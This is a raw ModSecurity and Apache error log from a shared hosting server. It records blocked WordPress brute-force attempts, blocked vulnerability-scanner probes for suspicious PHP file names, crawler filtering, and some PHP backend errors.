[Tue May 26 16:17:40.518527 2026] [security2:error] [pid 782634:tid 782783] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV6TP_P9qBfeb1w76ZVvwAAABM"]
[Tue May 26 16:17:40.877936 2026] [security2:error] [pid 782634:tid 782837] [client 196.189.121.19:1936] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahV6TP_P9qBfeb1w76ZV0AAAAEk"]
[Tue May 26 16:17:41.280802 2026] [security2:error] [pid 782634:tid 782817] [client 20.206.111.238:46569] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 238.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kexcouriers.onesoft.in"] [uri "/Cap.php"] [unique_id "ahV6Tf_P9qBfeb1w76ZV2QAAADU"]
[Tue May 26 16:17:41.280913 2026] [security2:error] [pid 782634:tid 782817] [client 20.206.111.238:46569] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "kexcouriers.onesoft.in"] [uri "/Cap.php"] [unique_id "ahV6Tf_P9qBfeb1w76ZV2QAAADU"]
[Tue May 26 16:17:41.335385 2026] [security2:error] [pid 782634:tid 782864] [client 106.219.85.83:18235] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.85.219.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV6Tf_P9qBfeb1w76ZV2AAAAGQ"]
[Tue May 26 16:17:41.335544 2026] [security2:error] [pid 782634:tid 782864] [client 106.219.85.83:18235] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV6Tf_P9qBfeb1w76ZV2AAAAGQ"]
[Tue May 26 16:17:42.584698 2026] [security2:error] [pid 782634:tid 782703] [remote 13.42.154.237:46858] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 237.154.42.13.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "friendsalongtheway.net"] [uri "/wp-login.php"] [unique_id "ahV6Tv_P9qBfeb1w76ZV7AAAYEQ"]
[Tue May 26 16:17:42.768942 2026] [security2:error] [pid 782634:tid 782712] [remote 172.104.164.56:46426] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 56.164.104.172.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/wp-login.php"] [unique_id "ahV6Tv_P9qBfeb1w76ZV9gAAJE0"]
[Tue May 26 16:17:43.279336 2026] [security2:error] [pid 782634:tid 782829] [client 20.206.111.238:14720] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 238.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kexcouriers.onesoft.in"] [uri "/like.php"] [unique_id "ahV6T__P9qBfeb1w76ZWCAAAAEE"]
[Tue May 26 16:17:43.279466 2026] [security2:error] [pid 782634:tid 782829] [client 20.206.111.238:14720] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "kexcouriers.onesoft.in"] [uri "/like.php"] [unique_id "ahV6T__P9qBfeb1w76ZWCAAAAEE"]
[Tue May 26 16:17:43.840674 2026] [security2:error] [pid 782634:tid 782810] [client 31.57.184.107:52857] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 107.184.57.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "www.traderscafe.jiyani.in"] [uri "/wp-login.php"] [unique_id "ahV6T__P9qBfeb1w76ZWDwAAAC4"], referer: https://duckduckgo.com/
[Tue May 26 16:17:44.996040 2026] [security2:error] [pid 782634:tid 782789] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV6UP_P9qBfeb1w76ZWJQAAABk"]
[Tue May 26 16:17:45.368254 2026] [security2:error] [pid 782634:tid 782736] [remote 74.7.241.58:53626] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/"] [unique_id "ahV6Uf_P9qBfeb1w76ZWOwAACGU"], referer: https://www.billing.mosykay.com/?path=/home1/taote1zo/public_html/shop/wp-includes
[Tue May 26 16:17:45.666089 2026] [security2:error] [pid 782634:tid 782877] [client 57.141.2.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV6Uf_P9qBfeb1w76ZWOgAAAHE"]
[Tue May 26 16:17:46.222364 2026] [security2:error] [pid 782634:tid 782840] [client 20.206.111.238:46564] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 238.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kexcouriers.onesoft.in"] [uri "/we.php"] [unique_id "ahV6Uv_P9qBfeb1w76ZWUQAAAEw"]
[Tue May 26 16:17:46.222465 2026] [security2:error] [pid 782634:tid 782840] [client 20.206.111.238:46564] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "kexcouriers.onesoft.in"] [uri "/we.php"] [unique_id "ahV6Uv_P9qBfeb1w76ZWUQAAAEw"]
[Tue May 26 16:17:46.877088 2026] [security2:error] [pid 782634:tid 782847] [client 57.141.2.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV6Uv_P9qBfeb1w76ZWWAAAAFM"]
[Tue May 26 16:17:47.189362 2026] [security2:error] [pid 782634:tid 782866] [client 197.138.48.2:63205] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahV6U__P9qBfeb1w76ZWYgAAAGY"]
[Tue May 26 16:17:48.384542 2026] [security2:error] [pid 782634:tid 782799] [client 20.206.111.238:15224] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 238.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kexcouriers.onesoft.in"] [uri "/wp.php"] [unique_id "ahV6VP_P9qBfeb1w76ZWdQAAACM"]
[Tue May 26 16:17:48.384650 2026] [security2:error] [pid 782634:tid 782799] [client 20.206.111.238:15224] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "kexcouriers.onesoft.in"] [uri "/wp.php"] [unique_id "ahV6VP_P9qBfeb1w76ZWdQAAACM"]
[Tue May 26 16:17:49.075566 2026] [security2:error] [pid 782634:tid 782842] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV6VP_P9qBfeb1w76ZWewAAAE4"]
[Tue May 26 16:17:49.261900 2026] [security2:error] [pid 782634:tid 782724] [remote 34.88.138.128:11776] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.138.88.34.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "nicmaperu.com"] [uri "/wp-login.php"] [unique_id "ahV6Vf_P9qBfeb1w76ZWggAAQFk"]
[Tue May 26 16:17:49.354004 2026] [security2:error] [pid 782634:tid 782870] [client 20.206.111.238:14778] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 238.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kexcouriers.onesoft.in"] [uri "/wp-indx.php"] [unique_id "ahV6Vf_P9qBfeb1w76ZWhgAAAGo"]
[Tue May 26 16:17:49.354102 2026] [security2:error] [pid 782634:tid 782870] [client 20.206.111.238:14778] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "kexcouriers.onesoft.in"] [uri "/wp-indx.php"] [unique_id "ahV6Vf_P9qBfeb1w76ZWhgAAAGo"]
[Tue May 26 16:17:49.745379 2026] [security2:error] [pid 782634:tid 782798] [client 103.44.52.196:48768] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.52.44.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV6Vf_P9qBfeb1w76ZWiwAAACI"]
[Tue May 26 16:17:49.745511 2026] [security2:error] [pid 782634:tid 782798] [client 103.44.52.196:48768] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV6Vf_P9qBfeb1w76ZWiwAAACI"]
[Tue May 26 16:17:50.354403 2026] [security2:error] [pid 782634:tid 782867] [client 20.206.111.238:15196] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 238.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kexcouriers.onesoft.in"] [uri "/zoo.php"] [unique_id "ahV6Vv_P9qBfeb1w76ZWlwAAAGc"]
[Tue May 26 16:17:50.354516 2026] [security2:error] [pid 782634:tid 782867] [client 20.206.111.238:15196] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "kexcouriers.onesoft.in"] [uri "/zoo.php"] [unique_id "ahV6Vv_P9qBfeb1w76ZWlwAAAGc"]
[Tue May 26 16:17:50.522601 2026] [security2:error] [pid 782634:tid 782856] [client 66.146.235.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahV6Vv_P9qBfeb1w76ZWnQAAAFw"], referer: https://www.anujtradingco.com/
[Tue May 26 16:17:51.092760 2026] [security2:error] [pid 782634:tid 782804] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV6Vv_P9qBfeb1w76ZWoAAAACg"]
[Tue May 26 16:17:52.061150 2026] [security2:error] [pid 782634:tid 782808] [client 66.146.235.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahV6V__P9qBfeb1w76ZWvgAAACw"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1444431&moderation-hash=db854aec872b4e8b0761d9bdf145f418
[Tue May 26 16:17:52.096335 2026] [security2:error] [pid 782634:tid 782812] [client 106.219.85.83:6631] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.85.219.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV6WP_P9qBfeb1w76ZWwgAAADA"]
[Tue May 26 16:17:52.096566 2026] [security2:error] [pid 782634:tid 782812] [client 106.219.85.83:6631] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV6WP_P9qBfeb1w76ZWwgAAADA"]
[Tue May 26 16:17:52.490412 2026] [security2:error] [pid 782634:tid 782856] [client 20.206.111.238:15194] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 238.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kexcouriers.onesoft.in"] [uri "/wp-link-spm.php"] [unique_id "ahV6WP_P9qBfeb1w76ZWzQAAAFw"]
[Tue May 26 16:17:52.490497 2026] [security2:error] [pid 782634:tid 782856] [client 20.206.111.238:15194] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "kexcouriers.onesoft.in"] [uri "/wp-link-spm.php"] [unique_id "ahV6WP_P9qBfeb1w76ZWzQAAAFw"]
[Tue May 26 16:17:52.946127 2026] [security2:error] [pid 782634:tid 782766] [client 197.138.48.2:63213] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahV6WP_P9qBfeb1w76ZW2AAAAAI"]
[Tue May 26 16:17:53.047011 2026] [security2:error] [pid 782634:tid 782848] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV6WP_P9qBfeb1w76ZW0wAAAFQ"]
[Tue May 26 16:17:53.710993 2026] [security2:error] [pid 782634:tid 782828] [client 138.229.102.214:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahV6Wf_P9qBfeb1w76ZW8QAAAEA"], referer: https://www.anujtradingco.com/
[Tue May 26 16:17:55.178863 2026] [security2:error] [pid 782634:tid 782771] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV6Wv_P9qBfeb1w76ZXBQAAAAc"]
[Tue May 26 16:17:55.689816 2026] [security2:error] [pid 782634:tid 782791] [client 138.229.102.214:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahV6W__P9qBfeb1w76ZXDgAAABs"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1467284&moderation-hash=f75e3ab5f755a6eb32dec425d7d82516
[Tue May 26 16:17:55.723635 2026] [security2:error] [pid 782634:tid 782891] [client 20.206.111.238:31214] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 238.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kexcouriers.onesoft.in"] [uri "/wp-link-snpm.php"] [unique_id "ahV6W__P9qBfeb1w76ZXFQAAAH8"]
[Tue May 26 16:17:55.723740 2026] [security2:error] [pid 782634:tid 782891] [client 20.206.111.238:31214] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "kexcouriers.onesoft.in"] [uri "/wp-link-snpm.php"] [unique_id "ahV6W__P9qBfeb1w76ZXFQAAAH8"]
[Tue May 26 16:17:56.834209 2026] [security2:error] [pid 782634:tid 782824] [client 88.99.80.227:29784] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "ucdc.co.in"] [uri "/index.php"] [unique_id "ahV6XP_P9qBfeb1w76ZXKgAAADw"], referer: http://ucdc.co.in/
[Tue May 26 16:17:56.866296 2026] [security2:error] [pid 782634:tid 782812] [client 20.206.111.238:31201] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 238.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kexcouriers.onesoft.in"] [uri "/xminie.php"] [unique_id "ahV6XP_P9qBfeb1w76ZXKwAAADA"]
[Tue May 26 16:17:56.866410 2026] [security2:error] [pid 782634:tid 782812] [client 20.206.111.238:31201] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "kexcouriers.onesoft.in"] [uri "/xminie.php"] [unique_id "ahV6XP_P9qBfeb1w76ZXKwAAADA"]
[Tue May 26 16:17:57.159350 2026] [security2:error] [pid 782634:tid 782756] [remote 165.22.95.96:55154] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 96.95.22.165.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "crustiesplacebakery.com.thedebateafrica.org"] [uri "/wp-login.php"] [unique_id "ahV6XP_P9qBfeb1w76ZXLwAAI3k"]
[Tue May 26 16:17:57.224209 2026] [security2:error] [pid 782634:tid 782777] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV6XP_P9qBfeb1w76ZXKQAAAA0"]
[Tue May 26 16:17:58.451888 2026] [lsapi:error] [pid 782634:tid 782820] [client 157.42.22.12:0] [host samayikprasanga.in] Connect to backend failed with CONNECTION_RESET on sending request(GET /index3.php HTTP/1.1); uri(/index3.php): ReceiveAckHdr: backend reset connection: errno 104 (possibly memlimit for LVE ID 792 with UID 792 too small), check http://docs.cloudlinux.com/mod_lsapi_troubleshooting.html, referer: https://www.samayikprasanga.in/
[Tue May 26 16:17:59.100435 2026] [security2:error] [pid 782634:tid 782826] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV6Xv_P9qBfeb1w76ZXXwAAAD4"]
[Tue May 26 16:17:59.114655 2026] [lsapi:error] [pid 782634:tid 782831] [client 66.249.64.169:0] [host doyecpa.com] Error receiving response header (lsphp is killed?): ReceiveResponseHeader: receive pkg hdr failed: ReceivePkgHdr: nothing to read from backend (LVE ID 1035; user ID 1035), check http://docs.cloudlinux.com/mod_lsapi_troubleshooting.html
[Tue May 26 16:17:59.444342 2026] [security2:error] [pid 782634:tid 782876] [client 122.183.49.161:11960] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahV6X__P9qBfeb1w76ZXfgAAAHA"]
[Tue May 26 16:18:00.202525 2026] [security2:error] [pid 782634:tid 782783] [client 103.44.52.196:48326] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.52.44.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV6YP_P9qBfeb1w76ZXkQAAABM"]
[Tue May 26 16:18:00.202655 2026] [security2:error] [pid 782634:tid 782783] [client 103.44.52.196:48326] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV6YP_P9qBfeb1w76ZXkQAAABM"]
[Tue May 26 16:18:00.933224 2026] [security2:error] [pid 782634:tid 782797] [client 66.146.235.19:41109] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahV6YP_P9qBfeb1w76ZXmAAAACE"], referer: https://anujtradingco.com
[Tue May 26 16:18:01.105681 2026] [security2:error] [pid 782634:tid 782872] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV6YP_P9qBfeb1w76ZXnAAAAGw"]
[Tue May 26 16:18:01.235213 2026] [security2:error] [pid 782634:tid 782778] [client 114.119.139.172:29017] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.ucdc.co.in"] [uri "/upload/visiter/"] [unique_id "ahV6Yf_P9qBfeb1w76ZXpgAAAA4"], referer: https://www.ucdc.co.in/upload/visiter/?C=M%3BO%3DA
[Tue May 26 16:18:01.505075 2026] [security2:error] [pid 782634:tid 782866] [client 148.153.56.60:58044] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "302"] [hostname "md-74.webhostbox.net"] [uri "/index.cgi"] [unique_id "ahV6Yf_P9qBfeb1w76ZXpwAAAGY"]
[Tue May 26 16:18:01.576034 2026] [security2:error] [pid 782634:tid 782804] [client 62.60.130.233:52301] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "buutic.azurmediatec.com"] [uri "/wp-login.php"] [unique_id "ahV6Yf_P9qBfeb1w76ZXrQAAACg"]
[Tue May 26 16:18:01.999089 2026] [security2:error] [pid 782634:tid 782821] [client 148.153.56.60:58048] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "302"] [hostname "md-74.webhostbox.net"] [uri "/index.cgi"] [unique_id "ahV6Yf_P9qBfeb1w76ZXvAAAADk"]
[Tue May 26 16:18:02.388038 2026] [security2:error] [pid 782634:tid 782783] [client 62.60.130.233:58107] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "buutic.azurmediatec.com"] [uri "/wp-login.php"] [unique_id "ahV6Yv_P9qBfeb1w76ZXyQAAABM"]
[Tue May 26 16:18:02.691333 2026] [security2:error] [pid 782634:tid 782838] [client 106.219.85.83:27147] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.85.219.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV6Yv_P9qBfeb1w76ZXzQAAAEo"]
[Tue May 26 16:18:02.691445 2026] [security2:error] [pid 782634:tid 782838] [client 106.219.85.83:27147] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV6Yv_P9qBfeb1w76ZXzQAAAEo"]
[Tue May 26 16:18:02.812709 2026] [security2:error] [pid 782634:tid 782811] [client 89.244.120.138:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV6Yv_P9qBfeb1w76ZXyAAAAC8"]
